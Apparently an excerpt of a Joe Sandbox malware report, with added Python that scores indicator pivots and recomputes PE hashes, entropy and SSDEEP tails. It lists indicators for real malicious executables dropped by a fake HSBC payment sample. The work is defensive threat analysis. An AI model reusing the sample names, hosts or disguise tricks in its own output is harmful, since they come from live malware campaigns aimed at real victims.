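The context tables above tie this sample's ASN and JA3 matches to earlier submissions, but a pivot is only as good as the indicator is specific. 23.55.153.106 appears solely with LummaC submissions, whereas 104.21.67.152 (a Cloudflare front) and 149.154.167.220 (the api.telegram.org address) appear with GuLoader, Snake Keylogger, VIP Keylogger, AteraAgent, Remcos and AgentTesla alike, and a JA3 value shared by that many families fingerprints a common TLS client stack rather than one actor's tooling. The Python below, added as an editor's example and not part of the Joe Sandbox report, transcribes the rows above and scores every context IP and every Match value by the number of distinct families it is tied to; the family-name normalisation and the three-family threshold are assumptions, not Joe Sandbox logic.

```python
"""Score the pivot value of sandbox 'context' indicators.

Editor's example, not part of the Joe Sandbox report. ROWS is transcribed
from the context tables above; canonical() and the three-family threshold
are assumptions, not Joe Sandbox logic.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ContextRow:
    match: str        # the 'Match' column: an ASN name or a JA3 fingerprint
    sample: str       # 'Associated Sample Name / URL'
    families: tuple   # 'Threat Name', split on ", "
    context: str      # 'Context' column (an IP address in this report)


JA3_A = "54328bd36c14bd82ddaa0c04b25ed9ad"
JA3_B = "3b5074b1b5d032e5620f69f9f700ff0e"
FIYATI = "fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe"
HESAP10 = "Hesap_Hareketleri_10122024_html.exe"

ROWS = [
    ContextRow("AKAMAI-ASN1EU", "http://abercombie.com", ("Unknown",), "23.195.38.175"),
    ContextRow("AKAMAI-ASN1EU", "https://listafrica.org/Receipt.html", ("WinSearchAbuse",), "23.195.39.65"),
    ContextRow("AKAMAI-ASN1EU", "ro7MnkIxJk.exe", ("LummaC",), "23.55.153.106"),
    ContextRow("AKAMAI-ASN1EU", "hQ3bNN05F8.exe", ("LummaC",), "23.55.153.106"),
    ContextRow("AKAMAI-ASN1EU", "FtbY5uqGY0.exe", ("LummaC",), "23.55.153.106"),
    ContextRow("AKAMAI-ASN1EU", "x1e7BlMmbl.exe", ("LummaC",), "23.55.153.106"),
    ContextRow("AKAMAI-ASN1EU", "8E273IHyAW.exe", ("LummaC Stealer",), "23.55.153.106"),
    ContextRow("AKAMAI-ASN1EU", "PURCHASE REQUIRED DETAILS 000487958790903403.exe",
               ("DBatLoader", "MassLogger RAT", "PureLog Stealer"), "172.234.222.143"),
    ContextRow("AKAMAI-ASN1EU", "la.bot.arm6.elf", ("Mirai",), "165.254.13.47"),
    ContextRow("AKAMAI-ASN1EU", "https://quiet-sun-5d9f.atmos4.workers.dev/login", ("Unknown",), "23.215.17.144"),
    ContextRow(JA3_A, "ST07933.exe", ("GuLoader", "Snake Keylogger"), "104.21.67.152"),
    ContextRow(JA3_A, FIYATI, ("Snake Keylogger", "VIP Keylogger"), "104.21.67.152"),
    ContextRow(JA3_A, "New_Order_List.exe", ("Snake Keylogger",), "104.21.67.152"),
    ContextRow(JA3_A, "Price Quotation-01.dqy.dll", ("Snake Keylogger",), "104.21.67.152"),
    ContextRow(JA3_A, "ORDER-6070Y689_0PF57682456_DECVC789378909740.js", ("WSHRat", "Snake Keylogger"), "104.21.67.152"),
    ContextRow(JA3_A, HESAP10, ("Snake Keylogger", "VIP Keylogger"), "104.21.67.152"),
    ContextRow(JA3_A, "Hesap_Hareketleri_09122024_html.exe", ("Snake Keylogger", "VIP Keylogger"), "104.21.67.152"),
    ContextRow(JA3_A, "E-dekont.exe", ("MassLogger RAT",), "104.21.67.152"),
    ContextRow(JA3_A, "Hesaphareketi-01.pdf.exe", ("Snake Keylogger",), "104.21.67.152"),
    ContextRow(JA3_A, "10122024Hesap hareketleriniz.exe", ("Snake Keylogger",), "104.21.67.152"),
    ContextRow(JA3_B, "ST07933.exe", ("GuLoader", "Snake Keylogger"), "149.154.167.220"),
    ContextRow(JA3_B, FIYATI, ("Snake Keylogger", "VIP Keylogger"), "149.154.167.220"),
    ContextRow(JA3_B, "Ref_31020563.exe", ("Unknown",), "149.154.167.220"),
    ContextRow(JA3_B, "Ref_31020563.exe", ("Unknown",), "149.154.167.220"),
    ContextRow(JA3_B, "xUPaeKk5wQ.msi", ("AteraAgent",), "149.154.167.220"),
    ContextRow(JA3_B, "7gBUqzSN3y.msi", ("AteraAgent",), "149.154.167.220"),
    ContextRow(JA3_B, "PO-8776-2024.js", ("Remcos",), "149.154.167.220"),
    ContextRow(JA3_B, "New Order Enquiry.js", ("AgentTesla",), "149.154.167.220"),
    ContextRow(JA3_B, "Bunker_STS_pdf.vbs", ("Unknown",), "149.154.167.220"),
    ContextRow(JA3_B, HESAP10, ("Snake Keylogger", "VIP Keylogger"), "149.154.167.220"),
]


def canonical(family: str) -> str:
    """Collapse vendor spelling variants ('LummaC' vs 'LummaC Stealer') to one key (assumption)."""
    name = family.strip().lower()
    for suffix in (" stealer", " keylogger", " rat"):
        if name.endswith(suffix):
            name = name[: -len(suffix)]
    return name


def pivot_quality(rows, key=lambda r: r.context, min_families=3):
    """Return {indicator: (verdict, distinct_families, distinct_samples)}.

    An indicator tied to many unrelated families is shared infrastructure
    (a CDN edge, a public API, a common TLS stack) and a weak pivot; one
    tied to a single family is worth hunting on. 'Unknown' is not a family.
    """
    families, samples = defaultdict(set), defaultdict(set)
    for r in rows:
        k = key(r)
        samples[k].add(r.sample)
        families[k].update(canonical(f) for f in r.families if f != "Unknown")
    verdict = {}
    for k, s in samples.items():
        n = len(families[k])
        verdict[k] = ("shared-infrastructure" if n >= min_families else "candidate-pivot", n, len(s))
    return verdict


if __name__ == "__main__":
    for title, k in (("by context IP", lambda r: r.context), ("by Match", lambda r: r.match)):
        print(title)
        for ind, (v, nf, ns) in sorted(pivot_quality(ROWS, key=k).items()):
            print(f"  {ind:34} {v:22} families={nf} samples={ns}")
```

Run stand-alone it prints one verdict per IP and per Match value; in a real pipeline the rows would come from the report's JSON export rather than a hand-transcribed list, and the threshold would be tuned against your own corpus.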
Process: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type: PE32 executable (console) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1508864
Entropy (8bit): 4.874489194750197
Encrypted: false
SSDEEP: 24576:uHCAR0ix/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:eCAdLNiXicJFFRGNzj3
MD5: F37BF169B265A422A92F97A742BFD179
SHA1: B39625B27493F5AAEE05B458C9A31255D6C6EFC7
SHA-256: 5DD9A7F7E6F95E3FF0AB20AFA59EB12B9843C95DCC4E61E5CFD6982A8444898A
SHA-512: 15F82E90D3DB52E5C0F7BED765CF6E8025AF2F90E7A6569D95F5D3F5D46A9A2237D3B2294A55CF34CB952399540E80A80766153225362758859BE5D5AFC7CCF1
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: low
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S.~.2.-.2.-.2.-n.G-.2.-n.E-J2.-n.D-.2.-.Z.,.2.-.Z.,.2.-.Z.,.2.-.J%-.2.-.2.-.2.-.[.,.2.-.[I-.2.-.2!-.2.-.[.,.2.-Rich.2.-........................PE..L...g.(c.....................6......&........0....@.................................}b......................................,b..<....p...............................L..8............................L..@............0..,............................text............................... ..`.rdata...8...0...:..."..............@..@.data........p.......\..............@....rsrc....`...p.......f..............@...................................................................................................................................................................................................................................................................................................................................

Process: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1450496
Entropy (8bit): 4.81616497624707
Encrypted: false
SSDEEP: 24576:QC/Kg8/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:kLNiXicJFFRGNzj3
MD5: 92FEE7518D2A379F7FCA054452F0537B
SHA1: 4738E541E5EBC13170C6807D58ACFBF3C5DB2D7F
SHA-256: B235817CEB82C19B0B7ADFA554A97029E2279D3E09FD86A12D03D41160F31AF8
SHA-512: 7892520F70A40A9E7E2252A70212D6B7AB27C7351F19E4E6DE7DDA68CFCAC8F29BA0ABAE010359DC3CDC27E4B20C7349C9EB0F256A52DE37AB6272B14A85125E
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: low
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........jZ..9Z..9Z..9...9Q..9...9%..9...9B..9...8r..9...8K..9...8H..9S.x9W..9Z..9..9...8]..9...9[..9Z.|9[..9...8[..9RichZ..9........PE..L...C.(c.........."......:...........\.......P....@...........................-.....U.......................................$...........0..............................8...............................@............P...............................text...19.......:.................. ..`.rdata...|...P...~...>..............@..@.data...............................@....rsrc...0...........................@..@.reloc...p...`.......r..............@...........................................................................................................................................................................................................................................................................................................

Process: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1469952
Entropy (8bit): 4.815369229873829
Encrypted: false
SSDEEP: 24576:sKdHN/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:5dtLNiXicJFFRGNzj3
MD5: 8173DF87AF97A79C84F478A94348B962
SHA1: 2FFB93C349C9B48D86337DEB9061845176BCE056
SHA-256: 8D350ADA320A11EAA7252F4A797F2A77169C0E487B1D0029EBC07860DEF0DC73
SHA-512: 49DB271304EE3BE1072E20AD906EDDD5D0A49EB48441D031C66FDC160D4710FE3F600CDAC9FAB8FBF4EA856F4DFD6113580301DAC086D20094AE4387A5AC7BF8
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: low
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9..X...X...X..-....X..-....X..-....X...0...X...0...X...0...X... n..X...X..YX..<1.X..<1...X...Xj..X..<1...X..Rich.X..........................PE..d...G.(c.........."......J...^......Tr.........@.............................0.......Y.... .................................................,........ ..0...............................8............................................`..`............................text....H.......J.................. ..`.rdata.......`.......N..............@..@.data........ ......................@....pdata..............................@..@.rsrc...0.... ......."..............@..@.reloc...`..........................@...................................................................................................................................................................................................................................

Process: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 2203136
Entropy (8bit): 7.64249610374807
Encrypted: false
SSDEEP: 49152:PK0eqkSR7Xgo4TiRPnLWvJFLNiXicJFFRGNzj3:PK0pR7Xn4TiRCvJF7wRGpj3
MD5: DFE57CEDDB15F370B3152C892B279183
SHA1: DE31EBBF378FF3221618311FB06297C36F8136A5
SHA-256: 20AA5248852477BC723FB8609D91448C8B30B37B63F0FB2C62DD889E4B9C8D4E
SHA-512: 8D49A577DD6ED392F1D3D7F5DE6DBD00981C3E3A761F70B14F803EA301B6C237BB3AE0EA51FB3AD19B4AE33F688B5261C8730DBDE821B12DC9699222C88E37F6
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................Y;6....Y;4.x...Y;5...........................D......T...........H......H.8.....P....H......Rich...................PE..L...9.(c..........#..................d............@...........................".....4.!..............................................p..X...............................p...............................@...............X............................text.............................. ..`.rdata..$H.......J..................@..@.data....@... ......................@....rsrc........p......................@...................................................................................................................................................................................................................................................................................................................................

Process: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 2369024
Entropy (8bit): 7.56129387229166
Encrypted: false
SSDEEP: 49152:DfYP1JsEDkSR7Xgo4TiRPnLWvJFLNiXicJFFRGNzj3:7YPBR7Xn4TiRCvJF7wRGpj3
MD5: D1DC5F9D4C3746D93A5EB0D7D9E82598
SHA1: 07CD2290D463C31D8AA48F78E8776DBCE410E813
SHA-256: B41CD35B8B9BF67588D9DF052EB064FBF1A822E96E1844E1220D99BF345F245B
SHA-512: EAACE981795E25540B9F43B73916A1B24BF8EF641A74F9E42314A6FEF11108DF14A4CAF554B27C564F3D9AE5CCBB63B2F1EDFF6215D514D1500125B4C69FBC15
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<y..x...x...x....~.s....|......}.a...*p..i...*p..p...*p..H...q`..z...q`..a...x...s....q..[....qp.y...x...z....q..y...Richx...........PE..d...>.(c..........#..........0......(..........@..............................$.......$... .............................................................X........e...................n..p...................0p..(...0o...............0...............................text............................... ..`.rdata.......0......."..............@..@.data....R...0... ... ..............@....pdata...e.......f...@..............@..@.rsrc...............................@...................................................................................................................................................................................................................................................................................
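Every field in the dropped-file entries above is derivable from the raw bytes: the libmagic-style file type comes from the optional-header magic (PE32 vs PE32+), the COFF Machine field and the Subsystem field; the hashes and the 8-bit entropy from the file as a whole. Two things are worth checking rather than reading off the table. Three of the files sit near entropy 4.8 and two near 7.6, and values that high are what compressed or encrypted content (typically a packer's output) produces. Every SSDEEP digest also carries the same chunk suffix, LNiXicJFFRGNzj3, at the 49152 block size, which is consistent with one payload having been appended to several different host executables. The Python below, added as an editor's example and not part of the Joe Sandbox report, recomputes those fields from a PE image and extracts the shared SSDEEP tail; it uses only the standard library, builds header-only PE images as constructed test input, and the 7.0 entropy threshold for "likely packed" is an assumption.

```python
"""Recompute the dropped-file triage fields from raw bytes.

Editor's example, not part of the Joe Sandbox report. Standard library only.
build_minimal_pe() produces constructed test input; the 7.0 threshold for
'likely_packed' is an assumption.
"""
import hashlib
import math
import struct
from collections import Counter

# SSDEEP digests copied from the six dropped-file entries above.
SSDEEP_FROM_REPORT = [
    "24576:uHCAR0ix/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:eCAdLNiXicJFFRGNzj3",
    "24576:QC/Kg8/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:kLNiXicJFFRGNzj3",
    "24576:sKdHN/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:5dtLNiXicJFFRGNzj3",
    "49152:PK0eqkSR7Xgo4TiRPnLWvJFLNiXicJFFRGNzj3:PK0pR7Xn4TiRCvJF7wRGpj3",
    "49152:DfYP1JsEDkSR7Xgo4TiRPnLWvJFLNiXicJFFRGNzj3:7YPBR7Xn4TiRCvJF7wRGpj3",
    "24576:XYUcknn/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:XZcknnLNiXicJFFRGNzj3",
]


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte (0.0 to 8.0), the report's 'Entropy (8bit)'."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def pe_summary(data: bytes, packed_threshold: float = 7.0) -> dict:
    """Parse DOS, COFF and optional headers plus the section table of a PE image."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    pe = struct.unpack_from("<I", data, 0x3C)[0]                  # e_lfanew
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    machine, nsec, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, pe + 4)
    magic = struct.unpack_from("<H", data, pe + 24)[0]             # 0x10b PE32, 0x20b PE32+
    subsystem = struct.unpack_from("<H", data, pe + 24 + 68)[0]    # same offset in both formats
    fmt = {0x10B: "PE32", 0x20B: "PE32+"}.get(magic, f"unknown(0x{magic:x})")
    mach = {0x14C: "Intel 80386", 0x8664: "x86-64"}.get(machine, f"0x{machine:x}")
    sub = {2: "GUI", 3: "console"}.get(subsystem, str(subsystem))
    sections, table = [], pe + 24 + opt_size
    for i in range(nsec):
        name, _vsize, _va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, table + 40 * i)
        raw = data[raw_ptr:raw_ptr + raw_size]
        sections.append((name.rstrip(b"\0").decode("ascii", "replace"), raw_size, round(shannon_entropy(raw), 3)))
    entropy = round(shannon_entropy(data), 3)
    return {
        "file_type": f"{fmt} executable ({sub}) {mach}, for MS Windows",   # libmagic wording as in the report
        "md5": hashlib.md5(data).hexdigest().upper(),
        "sha256": hashlib.sha256(data).hexdigest().upper(),
        "entropy": entropy,
        "likely_packed": entropy >= packed_threshold,
        "sections": sections,
    }


def ssdeep_common_tail(digests) -> str:
    """Longest chunk suffix shared by all digests, compared at one block size.
    ssdeep emits chunk1 at block size b and chunk2 at 2b, so chunk2 of a 'b'
    digest lines up with chunk1 of a '2b' digest; a shared suffix means shared
    trailing content, as when one payload is appended to many hosts."""
    parsed = [(int(b), c1, c2) for b, c1, c2 in (d.split(":") for d in digests)]
    top = max(b for b, _, _ in parsed)
    chunks = []
    for b, c1, c2 in parsed:
        if b == top:
            chunks.append(c1)
        elif 2 * b == top:
            chunks.append(c2)
        else:
            raise ValueError("block sizes differ by more than 2x; not comparable")
    tail = ""
    for i in range(1, min(len(c) for c in chunks) + 1):
        cand = chunks[0][-i:]
        if not all(c.endswith(cand) for c in chunks):
            break
        tail = cand
    return tail


def build_minimal_pe(pe32plus: bool, subsystem: int, sections) -> bytes:
    """Constructed test input: a header-only PE image (not loadable) with the given sections."""
    opt_size = 112 if pe32plus else 96
    pe = 64
    raw_ptr = pe + 24 + opt_size + 40 * len(sections)
    dos = b"MZ" + bytes(58) + struct.pack("<I", pe)
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x8664 if pe32plus else 0x14C,
                                    len(sections), 0, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x20B if pe32plus else 0x10B)
    struct.pack_into("<H", opt, 68, subsystem)
    headers, body = b"", b""
    for name, payload in sections:
        headers += struct.pack("<8sIIIIIIHHI", name, len(payload), 0, len(payload), raw_ptr, 0, 0, 0, 0, 0)
        body += payload
        raw_ptr += len(payload)
    return bytes(dos + coff + opt + headers + body)


def demo_images():
    """Constructed: a plain 32-bit console image, and a 64-bit GUI image that is mostly high-entropy data."""
    plain = build_minimal_pe(False, 3, [(b".text", b"\x90" * 64), (b".data", bytes(range(256)))])
    dense = build_minimal_pe(True, 2, [(b".text", bytes(range(256)) * 8)])
    return plain, dense


if __name__ == "__main__":
    for img in demo_images():
        print(pe_summary(img))
    print("shared SSDEEP tail:", ssdeep_common_tail(SSDEEP_FROM_REPORT))
```

On a real dropped file, pe_summary() reads the whole image from disk and the per-section entropies tell you where the high-entropy content lives (a single oversized, near-8.0 section next to a tiny .text is the usual packer shape); the whole-file figure alone, which is all the report prints, cannot distinguish that from a large embedded resource.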
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1400832
                                                                                                                                                  Entropy (8bit):4.651221550847446
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:XYUcknn/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:XZcknnLNiXicJFFRGNzj3
                                                                                                                                                  MD5:0D98235FCBD601D65E75D7BFE76BFF2B
                                                                                                                                                  SHA1:A57F11F9164729C46B4F182F5D2DF9ADCC6D1ACC
                                                                                                                                                  SHA-256:36E4748406677954D508FD57BFCC30B9A95F8082F4DB418EFEE47C3EA6581124
                                                                                                                                                  SHA-512:5A75A73FEF03835A07F97567869E238C1980921FFD481E162A21EC049559DE3BE7B623C65A7D04676667BC086A4031052AE06163B5B99C8BD158054EA02ABCD1
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1640448
                                                                                                                                                  Entropy (8bit):7.159472259252879
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:49152:456AqSPyC+NltpScpzbtvpJoMQSq/jrQaSJLNiXicJFFRGNzj3:LSktbpn7wRGpj3
                                                                                                                                                  MD5:6A02DD3E16D7A89D052D45B7D6A25BEF
                                                                                                                                                  SHA1:1DB101B08732C4770DB7BE40606F062DA58D4381
                                                                                                                                                  SHA-256:B16ECC67F10F27E068A4B5ED61E4709F0D0DB1151AC4DBCD36F0EB59C4FC7771
                                                                                                                                                  SHA-512:4A025B5B7D5131248F4AC7D04A19AB02F1A6ADAAEC920BED46ED1177B0E782DC67E9E03CCD20FE1CF1E85A4617AE9774686FC446CEC7D3D8BC357B8CEA33ADD8
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2953728
                                                                                                                                                  Entropy (8bit):7.089738687162478
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:49152:HGSXoV72tpV9XE8Wwi1aCvYMdjluS/fYw44RxLWLNiXicJFFRGNzj3:v4OEtwiICvYM3f27wRGpj3
                                                                                                                                                  MD5:F0AB07BD403DA7E7BFACE74A65A2BA5B
                                                                                                                                                  SHA1:42A24F30A4CCA3F9B04F847EF8A1B5F1B8F161A1
                                                                                                                                                  SHA-256:0A973128642684E3AA3ECBB150179EEDAA9A3AD3B3BC41CD2480AD1951DFECBD
                                                                                                                                                  SHA-512:787870CDDE114C05F0260C3C3DC12A0D1450F86C2C5879D7A3C5E203C34FC28E5B48888039DF554304A884AAF5247A1FA48907E8A344A2616DC5FCB0E9A03B79
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1641472
                                                                                                                                                  Entropy (8bit):5.075016436883043
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:VAMvR+3kMbVjhh/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:SE+lbVjhhLNiXicJFFRGNzj3
                                                                                                                                                  MD5:AEFE5250CCFA87E82896BFAF8F4EF72D
                                                                                                                                                  SHA1:5F316FACB42636E053E801292F901B8DC7590807
                                                                                                                                                  SHA-256:B827F0107CA3F045C50F3DD92411489799AEED5665A1B675C0ECA8E6CE74DB9E
                                                                                                                                                  SHA-512:E0849F174D98502A05F009014D243853F94031DDF54F0AD15E53379E90E4AB046031A7BBD1A369928B3FF477D840818FD95B076D70B0286D34FF1594E72E19D6
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  Process:C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1445888
                                                                                                                                                  Entropy (8bit):4.8101812302100875
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:rxGBcmlF/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:FGy+FLNiXicJFFRGNzj3
                                                                                                                                                  MD5:423F1F6668442F29DF26625C3F1F2479
                                                                                                                                                  SHA1:B806982B875EF90D605AB870CEEE90F3A010D708
                                                                                                                                                  SHA-256:73923FCC7BA205BB632A7DE06F1050266D2EEA0BF8F6FB7219F7FCABDCE8C522
                                                                                                                                                  SHA-512:B75AAA01EA5DB7363170DC8581812877FDC69880899203AD4213E0A09C46276A2BAE17EAD5BE6D52FEECA20D61409BABFC2B1045359E50C297B4F6826805CA8F
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1800192
                                                                                                                                                  Entropy (8bit):5.3021708613232725
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:B0vHyTLj8trn3ws3/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:0Wj4rgs3LNiXicJFFRGNzj3
                                                                                                                                                  MD5:601631AC73B2657C8484C7B8ACD72744
                                                                                                                                                  SHA1:3CACE0C96BBCCE24857B4CEEB113AF34CCC36989
                                                                                                                                                  SHA-256:822C79DEB418579EB1165C636D7B27D3AE09E29BAD2F3F7BC2BDA5E12B48A08E
                                                                                                                                                  SHA-512:5E132A5463F5608F413F1098CE7AE23AD3319848954DFBDDA143F7C74B0CC9D42F699BA39350DA377E02480AFFEF3C039F66B73E87F2222477B1FFA3867F6191
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1781760
                                                                                                                                                  Entropy (8bit):7.271336010967807
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:49152:B4ijwGJra0uAUfkVy7/ZmLNiXicJFFRGNzj3:BNjwGJrakUQyw7wRGpj3
                                                                                                                                                  MD5:3644900F23B4B044A117CC0C340482A8
                                                                                                                                                  SHA1:9B7A6CDFC91678FC31BF4A991BC0764E2B57996E
                                                                                                                                                  SHA-256:0E65536F92924A2A57448D3528E0A78263EBB79FF61CCF5B666FC5206F20434F
                                                                                                                                                  SHA-512:341E8210BA1A6C381314E3753057AED0B0DD9D791739F9294853EFD76FB1CC07D55F1B5FC84C9C184FA25ED4A26C95C23C0913324A48BAB7133D5B9AADB8EBEC
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1318400
                                                                                                                                                  Entropy (8bit):7.4383605944119875
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:LeR0gB6axoCxyR6RLQRF/TzJqe58BimZ/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:FgHxWR6uBTzge5MimZLNiXicJFFRGNzb
                                                                                                                                                  MD5:CF3995E1B49C54199D91B11F24808B8A
                                                                                                                                                  SHA1:3D42E1EE91679591171AF0BCED57AC270609E7B9
                                                                                                                                                  SHA-256:F4057370B95922B8540AB9D40F92D5736C19803AC605D393166AF02B39F89942
                                                                                                                                                  SHA-512:5606A6C2C74A9B7D7954CDFABBAFDF1A92B0FA539246038751CD67078B53455BFDFF8ADD99A536D213A885DFA17054AA848FB95C93DF76695B6D20BBB85CD316
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1530880
                                                                                                                                                  Entropy (8bit):4.994897716042273
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:kpwOtO7H/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:kmOtmHLNiXicJFFRGNzj3
                                                                                                                                                  MD5:ACA0546EDCA38ACADBEBE503AB3B46F9
                                                                                                                                                  SHA1:F8AF0B198653F37A0A1EE254E209DC57BD8940A5
                                                                                                                                                  SHA-256:78D8A5E9C9D4F0D0DDC6F0ECF82C0AE1DC69F28891BF50F507018E4D4C9F3851
                                                                                                                                                  SHA-512:B34906C902F77C2A0BA3EFB0D6BF3BCB9F45EAD07CEC283F27F844284A1F92366A907DEB75C5935F766E4A31D49229FC95F0D3E503714A7CDCD5379117349F85
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                   • Antivirus: Avira, Detection: 100%
                                                                                                                                                   • Antivirus: Joe Sandbox ML, Detection: 100%
